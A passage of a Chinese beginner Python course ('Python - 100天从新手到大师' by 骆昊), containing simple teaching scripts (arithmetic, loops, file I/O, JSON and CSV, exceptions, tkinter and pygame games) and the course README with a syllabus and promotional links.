%d = %d' % (a, b, a // b)) print('%d %% %d = %d' % (a, b, a % b)) print('%d ** %d = %d' % (a, b, a ** b)) File: Day01-15/code/Day02/circle.py """ 输入半径计算圆的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ import math radius = float(input('请输入圆的半径: ')) perimeter = 2 * math.pi * radius area = math.pi * radius * radius print('周长: %.2f' % perimeter) print('面积: %.2f' % area) File: Day01-15/code/Day02/operator.py """ 运算符的使用 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 5 b = 10 c = 3 d = 4 e = 5 a += b a -= c a *= d a /= e print("a = ", a) flag1 = 3 > 2 flag2 = 2 < 1 flag3 = flag1 and flag2 flag4 = flag1 or flag2 flag5 = not flag1 print("flag1 = ", flag1) print("flag2 = ", flag2) print("flag3 = ", flag3) print("flag4 = ", flag4) print("flag5 = ", flag5) print(flag1 is True) print(flag2 is not False) File: Day01-15/code/Day02/centigrade.py """ 将华氏温度转换为摄氏温度 F = 1.8C + 32 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ f = float(input('请输入华氏温度: ')) c = (f - 32) / 1.8 print('%.1f华氏度 = %.1f摄氏度' % (f, c)) File: Day01-15/code/Day02/variable4.py """ 检查变量的类型 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = 1000000000000000000 c = 12.345 d = 1 + 5j e = 'A' f = 'hello, world' g = True print(type(a)) print(type(b)) print(type(c)) print(type(d)) print(type(e)) print(type(f)) print(type(g)) File: Day01-15/code/Day02/variable5.py """ 类型转换 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = str(a) c = 12.345 d = str(c) e = '123' f = int(e) g = '123.456' h = float(g) i = False j = str(i) k = 'hello' m = bool(k) print(a) print(type(a)) print(b) print(type(b)) print(c) print(type(c)) print(d) print(type(d)) print(e) print(type(e)) print(f) print(type(f)) print(g) print(type(g)) print(h) print(type(h)) print(i) print(type(i)) print(j) print(type(j)) print(k) print(type(k)) print(m) print(type(m)) File: Day01-15/code/Day02/strings.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ str1 = 'hello, world!' print('字符串的长度是:', len(str1)) print('单词首字母大写: ', str1.title()) print('字符串变大写: ', str1.upper()) # str1 = str1.upper() print('字符串是不是大写: ', str1.isupper()) print('字符串是不是以hello开头: ', str1.startswith('hello')) print('字符串是不是以hello结尾: ', str1.endswith('hello')) print('字符串是不是以感叹号开头: ', str1.startswith('!')) print('字符串是不是一感叹号结尾: ', str1.endswith('!')) str2 = '- \u9a86\u660a' str3 = str1.title() + ' ' + str2.lower() print(str3) File: Day01-15/code/Day02/variable1.py """ 使用变量保存数据并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 321 b = 123 print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day05/prime.py """ 输出2~99之间的素数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 100): is_prime = True for factor in range(2, int(math.sqrt(num)) + 1): if num % factor == 0: is_prime = False break if is_prime: print(num, end=' ') File: Day01-15/code/Day05/palindrome.py """ 判断输入的正整数是不是回文数 回文数是指将一个正整数从左往右排列和从右往左排列值一样的数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ num = int(input('请输入一个正整数: ')) temp = num num2 = 0 while temp > 0: num2 *= 10 num2 += temp % 10 temp //= 10 if num == num2: print('%d是回文数' % num) else: print('%d不是回文数' % num) File: Day01-15/code/Day05/guess.py """ 猜数字游戏 计算机出一个1~100之间的随机数由人来猜 计算机根据人猜的数字分别给出提示大一点/小一点/猜对了 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import random answer = random.randint(1, 100) counter = 0 while True: counter += 1 number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break print('你总共猜了%d次' % counter) if counter > 7: print('你的智商余额明显不足') File: Day01-15/code/Day05/lily.py """ 找出100~999之间的所有水仙花数 水仙花数是各位立方和等于这个数本身的数 如: 153 = 1**3 + 5**3 + 3**3 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for num in range(100, 1000): low = num % 10 mid = num // 10 % 10 high = num // 100 if num == low ** 3 + mid ** 3 + high ** 3: print(num) File: Day01-15/code/Day05/perfect.py """ 找出1~9999之间的所有完美数 完美数是除自身外其他所有因子的和正好等于这个数本身的数 例如: 6 = 1 + 2 + 3, 28 = 1 + 2 + 4 + 7 + 14 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 10000): result = 0 for factor in range(1, int(math.sqrt(num)) + 1): if num % factor == 0: result += factor if factor > 1 and num // factor != factor: result += num // factor if result == num: print(num) File: Day01-15/code/Day05/table.py """ 输出乘法口诀表(九九表) Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for i in range(1, 10): for j in range(1, i + 1): print('%d*%d=%d' % (i, j, i * j), end='\t') print() File: Day01-15/code/Day05/craps.py """ Craps赌博游戏 玩家摇两颗色子 如果第一次摇出7点或11点 玩家胜 如果摇出2点 3点 12点 庄家胜 其他情况游戏继续 玩家再次要色子 如果摇出7点 庄家胜 如果摇出第一次摇的点数 玩家胜 否则游戏继续 玩家继续摇色子 玩家进入游戏时有1000元的赌注 全部输光游戏结束 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ from random import randint money = 1000 while money > 0: print('你的总资产为:', money) needs_go_on = False while True: debt = int(input('请下注: ')) if 0 < debt <= money: break first = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % first) if first == 7 or first == 11: print('玩家胜!') money += debt elif first == 2 or first == 3 or first == 12: print('庄家胜!') money -= debt else: needs_go_on = True while needs_go_on: current = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % current) if current == 7: print('庄家胜') money -= debt needs_go_on = False elif current == first: print('玩家胜') money += debt needs_go_on = False print('你破产了, 游戏结束!') File: Day01-15/code/Day05/chicken.py """ 求解《百钱百鸡》问题 1只公鸡5元 1只母鸡3元 3只小鸡1元 用100元买100只鸡 问公鸡 母鸡 小鸡各有多少只 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for x in range(0, 20): for y in range(0, 33): z = 100 - x - y if 5 * x + 3 * y + z / 3 == 100: print('公鸡: %d只, 母鸡: %d只, 小鸡: %d只' % (x, y, z)) File: Day01-15/code/Day05/fibonacci.py """ 输出斐波那契数列的前20个数 1 1 2 3 5 8 13 21 ... Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ a = 0 b = 1 for _ in range(20): a, b = b, a + b print(a, end=' ') File: Day01-15/code/Day11/csv1.py """ 读取CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv filename = 'example.csv' try: with open(filename) as f: reader = csv.reader(f) data = list(reader) except FileNotFoundError: print('无法打开文件:', filename) else: for item in data: print('%-30s%-20s%-10s' % (item[0], item[1], item[2])) File: Day01-15/code/Day11/json2.py """ 写入JSON文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json teacher_dict = {'name': '白元芳', 'age': 25, 'title': '讲师'} json_str = json.dumps(teacher_dict) print(json_str) print(type(json_str)) fruits_list = ['apple', 'orange', 'strawberry', 'banana', 'pitaya'] json_str = json.dumps(fruits_list) print(json_str) print(type(json_str)) File: Day01-15/code/Day11/file2.py """ 读取圆周率文件判断其中是否包含自己的生日 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ birth = input('请输入你的生日: ') with open('pi_million_digits.txt') as f: lines = f.readlines() pi_string = '' for line in lines: pi_string += line.strip() if birth in pi_string: print('Bingo!!!') File: Day01-15/code/Day11/ex2.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except (ValueError, ZeroDivisionError) as msg: print(msg) File: Day01-15/code/Day11/ex3.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time import sys filename = input('请输入文件名: ') try: with open(filename) as f: lines = f.readlines() except FileNotFoundError as msg: print('无法打开文件:', filename) print(msg) except UnicodeDecodeError as msg: print('非文本文件无法解码') sys.exit() else: for line in lines: print(line.rstrip()) time.sleep(0.5) finally: # 此处最适合做善后工作 print('不管发生什么我都会执行') File: Day01-15/code/Day11/file3.py """ 写文本文件 将100以内的素数写入到文件中 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ from math import sqrt def is_prime(n): for factor in range(2, int(sqrt(n)) + 1): if n % factor == 0: return False return True # 试一试有什么不一样 # with open('prime.txt', 'a') as f: with open('prime.txt', 'w') as f: for num in range(2, 100): if is_prime(num): f.write(str(num) + '\n') print('写入完成!') File: Day01-15/code/Day11/file4.py """ 读写二进制文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import base64 with open('mm.jpg', 'rb') as f: data = f.read() # print(type(data)) # print(data) print('字节数:', len(data)) # 将图片处理成BASE-64编码 print(base64.b64encode(data)) with open('girl.jpg', 'wb') as f: f.write(data) print('写入完成!') File: Day01-15/code/Day11/ex4.py """ 引发异常和异常栈 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ def f1(): raise AssertionError('发生异常') def f2(): f1() def f3(): f2() f3() File: Day01-15/code/Day11/file1.py """ 从文本文件中读取数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time def main(): # 一次性读取整个文件内容 with open('致橡树.txt', 'r', encoding='utf-8') as f: print(f.read()) # 通过for-in循环逐行读取 with open('致橡树.txt', mode='r') as f: for line in f: print(line, end='') time.sleep(0.5) print() # 读取文件按行读取到列表中 with open('致橡树.txt') as f: lines = f.readlines() print(lines) if __name__ == '__main__': main() File: Day01-15/code/Day11/ex1.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except ValueError: print('请输入整数') except ZeroDivisionError: print('除数不能为0') # 处理异常让代码不因异常而崩溃是一方面 # 更重要的是可以通过对异常的处理让代码从异常中恢复过来 File: Day01-15/code/Day11/json1.py """ 读取JSON数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json import csv2 json_str = '{"name": "骆昊", "age": 38, "title": "叫兽"}' result = json.loads(json_str) print(result) print(type(result)) print(result['name']) print(result['age']) # 把转换得到的字典作为关键字参数传入Teacher的构造器 teacher = csv2.Teacher(**result) print(teacher) print(teacher.name) print(teacher.age) print(teacher.title) # 请思考如何将下面JSON格式的天气数据转换成对象并获取我们需要的信息 # 稍后我们会讲解如何通过网络API获取我们需要的JSON格式的数据 """ { "wendu": "29", "ganmao": "各项气象条件适宜,发生感冒机率较低。但请避免长期处于空调房间中,以防感冒。", "forecast": [ { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 32℃", "type": "多云", "low": "低温 17℃", "date": "16日星期二" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 34℃", "type": "晴", "low": "低温 19℃", "date": "17日星期三" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "晴", "low": "低温 22℃", "date": "18日星期四" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "多云", "low": "低温 22℃", "date": "19日星期五" }, { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 34℃", "type": "晴", "low": "低温 21℃", "date": "20日星期六" } ], "yesterday": { "fl": "微风", "fx": "南风", "high": "高温 28℃", "type": "晴", "low": "低温 15℃", "date": "15日星期一" }, "aqi": "72", "city": "北京" } """ File: Day01-15/code/Day11/csv2.py """ 写入CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv class Teacher(object): def __init__(self, name, age, title): self.__name = name self.__age = age self.__title = title self.__index = -1 @property def name(self): return self.__name @property def age(self): return self.__age @property def title(self): return self.__title filename = 'teacher.csv' teachers = [Teacher('骆昊', 38, '叫兽'), Teacher('狄仁杰', 25, '砖家')] try: with open(filename, 'w') as f: writer = csv.writer(f) for teacher in teachers: writer.writerow([teacher.name, teacher.age, teacher.title]) except BaseException as e: print('无法写入文件:', filename) else: print('保存数据完成!') File: Day01-15/code/Day10/renju.py import pygame EMPTY = 0 BLACK = 1 WHITE = 2 black_color = [0, 0, 0] white_color = [255, 255, 255] class RenjuBoard(object): def __init__(self): self._board = [[]] * 15 self.reset() def reset(self): for row in range(len(self._board)): self._board[row] = [EMPTY] * 15 def move(self, row, col, is_black): if self._board[row][col] == EMPTY: self._board[row][col] = BLACK if is_black else WHITE return True return False def draw(self, screen): for index in range(1, 16): pygame.draw.line(screen, black_color, [40, 40 * index], [600, 40 * index], 1) pygame.draw.line(screen, black_color, [40 * index, 40], [40 * index, 600], 1) pygame.draw.rect(screen, black_color, [36, 36, 568, 568], 4) pygame.draw.circle(screen, black_color, [320, 320], 5, 0) pygame.draw.circle(screen, black_color, [160, 160], 5, 0) pygame.draw.circle(screen, black_color, [480, 480], 5, 0) pygame.draw.circle(screen, black_color, [480, 160], 5, 0) pygame.draw.circle(screen, black_color, [160, 480], 5, 0) for row in range(len(self._board)): for col in range(len(self._board[row])): if self._board[row][col] != EMPTY: ccolor = black_color \ if self._board[row][col] == BLACK else white_color pos = [40 * (col + 1), 40 * (row + 1)] pygame.draw.circle(screen, ccolor, pos, 20, 0) def main(): board = RenjuBoard() is_black = True pygame.init() pygame.display.set_caption('五子棋') screen = pygame.display.set_mode([640, 640]) screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYUP: pass elif event.type == pygame.MOUSEBUTTONDOWN\ and event.button == 1: x, y = event.pos row = round((y - 40) / 40) col = round((x - 40) / 40) if board.move(row, col, is_black): is_black = not is_black screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui2.py """ 使用tkinter创建GUI - 使用画布绘图 - 处理鼠标事件 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter def mouse_evt_handler(evt=None): row = round((evt.y - 20) / 40) col = round((evt.x - 20) / 40) pos_x = 40 * col pos_y = 40 * row canvas.create_oval(pos_x, pos_y, 40 + pos_x, 40 + pos_y, fill='black') top = tkinter.Tk() # 设置窗口尺寸 top.geometry('620x620') # 设置窗口标题 top.title('五子棋') # 设置窗口大小不可改变 top.resizable(False, False) # 设置窗口置顶 top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.bind('<Button-1>', mouse_evt_handler) canvas.create_rectangle(0, 0, 600, 600, fill='yellow', outline='white') for index in range(15): canvas.create_line(20, 20 + 40 * index, 580, 20 + 40 * index, fill='black') canvas.create_line(20 + 40 * index, 20, 20 + 40 * index, 580, fill='black') canvas.create_rectangle(15, 15, 585, 585, outline='black', width=4) canvas.pack() tkinter.mainloop() # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/snake.py from abc import ABCMeta, abstractmethod from enum import Enum, unique from random import randrange from threading import Thread import pygame class Color(object): """颜色""" GRAY = (242, 242, 242) BLACK = (0, 0, 0) GREEN = (0, 255, 0) PINK = (255, 20, 147) @unique class Direction(Enum): """方向""" UP = 0 RIGHT = 1 DOWN = 2 LEFT = 3 class GameObject(object, metaclass=ABCMeta): """游戏中的对象""" def __init__(self, x=0, y=0, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param color: 颜色 """ self._x = x self._y = y self._color = color @property def x(self): return self._x @property def y(self): return self._y @abstractmethod def draw(self, screen): """ 绘制 :param screen: 屏幕 """ pass class Wall(GameObject): """围墙""" def __init__(self, x, y, width, height, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param width: 宽度 :param height: 高度 :param color: 颜色 """ super().__init__(x, y, color) self._width = width self._height = height @property def width(self): return self._width @property def height(self): return self._height def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._width, self._height), 4) class Food(GameObject): """食物""" def __init__(self, x, y, size, color=Color.PINK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size self._hidden = False def draw(self, screen): if not self._hidden: pygame.draw.circle(screen, self._color, (self._x + self._size // 2, self._y + self._size // 2), self._size // 2, 0) self._hidden = not self._hidden class SnakeNode(GameObject): """蛇身上的节点""" def __init__(self, x, y, size, color=Color.GREEN): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size @property def size(self): return self._size def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._size, self._size), 0) pygame.draw.rect(screen, Color.BLACK, (self._x, self._y, self._size, self._size), 1) class Snake(GameObject): """蛇""" def __init__(self, x, y, size=20, length=5): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param length: 初始长度 """ super().__init__() self._dir = Direction.LEFT self._nodes = [] self._alive = True self._new_dir = None for index in range(length): node = SnakeNode(x + index * size, y, size) self._nodes.append(node) @property def dir(self): return self._dir @property def alive(self): return self._alive @property def head(self): return self._nodes[0] def change_dir(self, new_dir): """ 改变方向 :param new_dir: 新方向 """ if new_dir != self._dir and \ (self._dir.value + new_dir.value) % 2 != 0: self._new_dir = new_dir def move(self): """移动""" if self._new_dir: self._dir, self._new_dir = self._new_dir, None snake_dir = self._dir x, y, size = self.head.x, self.head.y, self.head.size if snake_dir == Direction.UP: y -= size elif snake_dir == Direction.RIGHT: x += size elif snake_dir == Direction.DOWN: y += size else: x -= size new_head = SnakeNode(x, y, size) self._nodes.insert(0, new_head) self._nodes.pop() def collide(self, wall): """ 撞墙 :param wall: 围墙 """ head = self.head if head.x < wall.x or head.x + head.size > wall.x + wall.width \ or head.y < wall.y or head.y + head.size > wall.y + wall.height: self._alive = False def eat_food(self, food): """ 吃食物 :param food: 食物 :return: 吃到食物返回True否则返回False """ if self.head.x == food.x and self.head.y == food.y: tail = self._nodes[-1] self._nodes.append(tail) return True return False def eat_self(self): """咬自己""" for index in range(4, len(self._nodes)): node = self._nodes[index] if node.x == self.head.x and node.y == self.head.y: self._alive = False def draw(self, screen): for node in self._nodes: node.draw(screen) def main(): def refresh(): """刷新游戏窗口""" screen.fill(Color.GRAY) wall.draw(screen) food.draw(screen) snake.draw(screen) pygame.display.flip() def handle_key_event(key_event): """处理按键事件""" key = key_event.key if key == pygame.K_F2: reset_game() elif key in (pygame.K_a, pygame.K_w, pygame.K_d, pygame.K_s): if snake.alive: if key == pygame.K_w: new_dir = Direction.UP elif key == pygame.K_d: new_dir = Direction.RIGHT elif key == pygame.K_s: new_dir = Direction.DOWN else: new_dir = Direction.LEFT snake.change_dir(new_dir) def create_food(): """创建食物""" unit_size = snake.head.size max_row = wall.height // unit_size max_col = wall.width // unit_size row = randrange(0, max_row) col = randrange(0, max_col) return Food(wall.x + unit_size * col, wall.y + unit_size * row, unit_size) def reset_game(): """重置游戏""" nonlocal food, snake food = create_food() snake = Snake(250, 290) def background_task(): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ class BackgroundTask(Thread): def run(self): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ wall = Wall(10, 10, 600, 600) snake = Snake(250, 290) food = create_food() pygame.init() screen = pygame.display.set_mode((620, 620)) pygame.display.set_caption('贪吃蛇') # 创建控制游戏每秒帧数的时钟 clock = pygame.time.Clock() running = True # 启动后台线程负责刷新窗口和让蛇移动 # BackgroundTask().start() Thread(target=background_task).start() # 处理事件的消息循环 while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYDOWN: handle_key_event(event) pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui3.py """ 使用tkinter创建GUI - 在窗口上制作动画 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import time # 播放动画效果的函数 def play_animation(): canvas.move(oval, 2, 2) canvas.update() top.after(50, play_animation) x = 10 y = 10 top = tkinter.Tk() top.geometry('600x600') top.title('动画效果') top.resizable(False, False) top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.create_rectangle(0, 0, 600, 600, fill='gray') oval = canvas.create_oval(10, 10, 60, 60, fill='red') canvas.pack() top.update() play_animation() tkinter.mainloop() # 请思考如何让小球碰到屏幕的边界就弹回 # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/ball.py from enum import Enum, unique from math import sqrt from random import randint import pygame @unique class Color(Enum): """颜色""" RED = (255, 0, 0) GREEN = (0, 255, 0) BLUE = (0, 0, 255) BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): """获得随机颜色""" r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return (r, g, b) class Ball(object): """球""" def __init__(self, x, y, radius, sx, sy, color=Color.RED): """初始化方法""" self.x = x self.y = y self.radius = radius self.sx = sx self.sy = sy self.color = color self.alive = True def move(self, screen): """移动""" self.x += self.sx self.y += self.sy if self.x - self.radius <= 0 or self.x + self.radius >= screen.get_width(): self.sx = -self.sx if self.y - self.radius <= 0 or self.y + self.radius >= screen.get_height(): self.sy = -self.sy def eat(self, other): """吃其他球""" if self.alive and other.alive and self != other: dx, dy = self.x - other.x, self.y - other.y distance = sqrt(dx ** 2 + dy ** 2) if distance < self.radius + other.radius \ and self.radius > other.radius: other.alive = False self.radius = self.radius + int(other.radius * 0.146) def draw(self, screen): """在窗口上绘制球""" pygame.draw.circle(screen, self.color, (self.x, self.y), self.radius, 0) def main(): # 定义用来装所有球的容器 balls = [] # 初始化导入的pygame中的模块 pygame.init() # 初始化用于显示的窗口并设置窗口尺寸 screen = pygame.display.set_mode((800, 600)) print(screen.get_width()) print(screen.get_height()) # 设置当前窗口的标题 pygame.display.set_caption('大球吃小球') # 定义变量来表示小球在屏幕上的位置 x, y = 50, 50 running = True # 开启一个事件循环处理发生的事件 while running: # 从消息队列中获取事件并对事件进行处理 for event in pygame.event.get(): if event.type == pygame.QUIT: running = False if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1: x, y = event.pos radius = randint(10, 100) sx, sy = randint(-10, 10), randint(-10, 10) color = Color.random_color() ball = Ball(x, y, radius, sx, sy, color) balls.append(ball) screen.fill((255, 255, 255)) for ball in balls: if ball.alive: ball.draw(screen) else: balls.remove(ball) pygame.display.flip() # 每隔50毫秒就改变小球的位置再刷新窗口 pygame.time.delay(50) for ball in balls: ball.move(screen) for other in balls: ball.eat(other) if __name__ == '__main__': main() File: Day01-15/code/Day10/gui1.py """ 使用tkinter创建GUI - 顶层窗口 - 控件 - 布局 - 事件回调 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import tkinter.messagebox def main(): flag = True # 修改标签上的文字 def change_label_text(): nonlocal flag flag = not flag color, msg = ('red', 'Hello, world!')\ if flag else ('blue', 'Goodbye, world!') label.config(text=msg, fg=color) # 确认退出 def confirm_to_quit(): if tkinter.messagebox.askokcancel('温馨提示', '确定要退出吗?'): top.quit() # 创建顶层窗口 top = tkinter.Tk() # 设置窗口大小 top.geometry('240x160') # 设置窗口标题 top.title('小游戏') # 创建标签对象 label = tkinter.Label(top, text='Hello, world!', font='Arial -32', fg='red') label.pack(expand=1) # 创建一个装按钮的容器 panel = tkinter.Frame(top) # 创建按钮对象 button1 = tkinter.Button(panel, text='修改', command=change_label_text) button1.pack(side='left') button2 = tkinter.Button(panel, text='退出', command=confirm_to_quit) button2.pack(side='right') panel.pack(side='bottom') # 开启主事件循环 tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day10/turtle1.py """ 用turtle模块绘图 这是一个非常有趣的模块 它模拟一只乌龟在窗口上爬行的方式来进行绘图 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import turtle turtle.pensize(3) turtle.penup() turtle.goto(-180, 150) turtle.pencolor('red') turtle.fillcolor('yellow') turtle.pendown() turtle.begin_fill() for _ in range(36): turtle.forward(200) turtle.right(170) turtle.end_fill() turtle.mainloop()
## Python - 100天从新手到大师 > **作者**:骆昊 > > **说明**:从项目上线到获得8w+星标以来,一直收到反馈说基础部分(前15天的内容)对新手来说是比较困难的,建议有配套视频进行讲解。最近把基础部分的内容重新制作了一个名为[“Python-Core-50-Courses”](<https://github.com/jackfrued/Python-Core-50-Courses>)的项目,用更为简单通俗的方式重写了这部分内容并附带了视频讲解,初学者可以看看这个新的仓库。国内用户如果访问GitHub比较慢的话,可以关注我的**知乎号[Python-Jack](https://www.zhihu.com/people/jackfrued)**,上面的[“从零开始学Python”](<https://zhuanlan.zhihu.com/c_1216656665569013760>)专栏比较适合初学者,其他的专栏如“数据思维和统计思维”、“基于Python的数据分析”等也在持续创作和更新中,欢迎大家关注、点赞和评论。 > > 想获取学习视频的小伙伴,大家可以扫描下面的二维码进入微信小程序,看看有没有适合自己的内容。大家心心念念的机器学习的内容在小程序中都可以找到,由我和我的同事为大家录制的。 > > <img src="res/study_card.png" style="zoom:20%;"> > > 大家在学习过程中如果遇到一些棘手的问题或者需要相关的学习资源,可以加入下面的QQ交流群,三个群是一样的加入一个即可,请不要重复加群,也不要在群里发布广告和其他色情、低俗或敏感内容。**如果缺乏自律性,有付费学习的需求,可以添加我的微信(jackfrued)私聊,备注好自己的称呼和需求,我会给大家提供一些学习方案和职业规划方面的指导**。 > > <img src="res/python_study_qq_group.png" style="zoom:30%;"> > > 配套的视频在抖音和B站持续更新中,有兴趣的小伙伴可以关注我的抖音或B站账号,最近刚刚起号,还希望大家多多支持,非常感谢您! > > <img src="res/qrcode.JPG" style="zoom:20%;"> > > 大家一直催更的《机器学习和深度学习》因个人和公司的原因,一直处于停滞状态,近期会开始更新相关内容,感谢大家一如既往的支持和理解。 ### Python应用领域和职业发展分析 简单的说,Python是一个“优雅”、“明确”、“简单”的编程语言。 - 学习曲线低,非专业人士也能上手 - 开源系统,拥有强大的生态圈 - 解释型语言,完美的平台可移植性 - 动态类型语言,支持面向对象和函数式编程 - 代码规范程度高,可读性强 Python在以下领域都有用武之地。 - 后端开发 - Python / Java / Go / PHP - DevOps - Python / Shell / Ruby - 数据采集 - Python / C++ / Java - 量化交易 - Python / C++ / R - 数据科学 - Python / R / Julia / Matlab - 机器学习 - Python / R / C++ / Julia - 自动化测试 - Python / Shell 作为一名Python开发者,根据个人的喜好和职业规划,可以选择的就业领域也非常多。 - Python后端开发工程师(服务器、云平台、数据接口) - Python运维工程师(自动化运维、SRE、DevOps) - Python数据分析师(数据分析、商业智能、数字化运营) - Python数据挖掘工程师(机器学习、深度学习、算法专家) - Python爬虫工程师 - Python测试工程师(自动化测试、测试开发) > **说明**:目前,**数据分析和数据挖掘是非常热门的方向**,因为不管是互联网行业还是传统行业都已经积累了大量的数据,各行各业都需要数据分析师从已有的数据中发现更多的商业价值,从而为企业的决策提供数据的支撑,这就是所谓的数据驱动决策。 给初学者的几个建议: - Make English as your working language. (让英语成为你的工作语言) - Practice makes perfect. (熟能生巧) - All experience comes from mistakes. (所有的经验都源于你犯过的错误) - Don't be one of the leeches. (不要当伸手党) - Either outstanding or out. (要么出众,要么出局) ### Day01~15 - Python语言基础 #### Day01 - [初识Python](./Day01-15/01.初识Python.md) - Python简介 - Python的历史 / Python的优缺点 / Python的应用领域 - 搭建编程环境 - Windows环境 / Linux环境 / MacOS环境 - 从终端运行Python程序 - Hello, world / `print`函数 / 运行程序 - 使用IDLE - 交互式环境(REPL) / 编写多行代码 / 运行程序 / 退出IDLE - 注释 - 注释的作用 / 单行注释 / 多行注释 #### Day02 - [语言元素](./Day01-15/02.语言元素.md) - 程序和进制 - 指令和程序 / 冯诺依曼机 / 二进制和十进制 / 八进制和十六进制 - 变量和类型 - 变量的命名 / 变量的使用 / `input`函数 / 检查变量类型 / 类型转换 - 数字和字符串 - 整数 / 浮点数 / 复数 / 字符串 / 字符串基本操作 / 字符编码 - 运算符 - 数学运算符 / 赋值运算符 / 比较运算符 / 逻辑运算符 / 身份运算符 / 运算符的优先级 - 应用案例 - 华氏温度转换成摄氏温度 / 输入圆的半径计算周长和面积 / 输入年份判断是否是闰年 #### Day03 - [分支结构](./Day01-15/03.分支结构.md) - 分支结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - if语句 - 简单的`if` / `if`-`else`结构 / `if`-`elif`-`else`结构 / 嵌套的`if` - 应用案例 - 用户身份验证 / 英制单位与公制单位互换 / 掷骰子决定做什么 / 百分制成绩转等级制 / 分段函数求值 / 输入三条边的长度如果能构成三角形就计算周长和面积 #### Day04 - [循环结构](./Day01-15/04.循环结构.md) - 循环结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - while循环 - 基本结构 / `break`语句 / `continue`语句 - for循环 - 基本结构 / `range`类型 / 循环中的分支结构 / 嵌套的循环 / 提前结束程序 - 应用案例 - 1~100求和 / 判断素数 / 猜数字游戏 / 打印九九表 / 打印三角形图案 / 猴子吃桃 / 百钱百鸡 #### Day05 - [构造程序逻辑](./Day01-15/05.构造程序逻辑.md) - 经典案例:水仙花数 / 百钱百鸡 / Craps赌博游戏 - 练习题目:斐波那契数列 / 完美数 / 素数 #### Day06 - 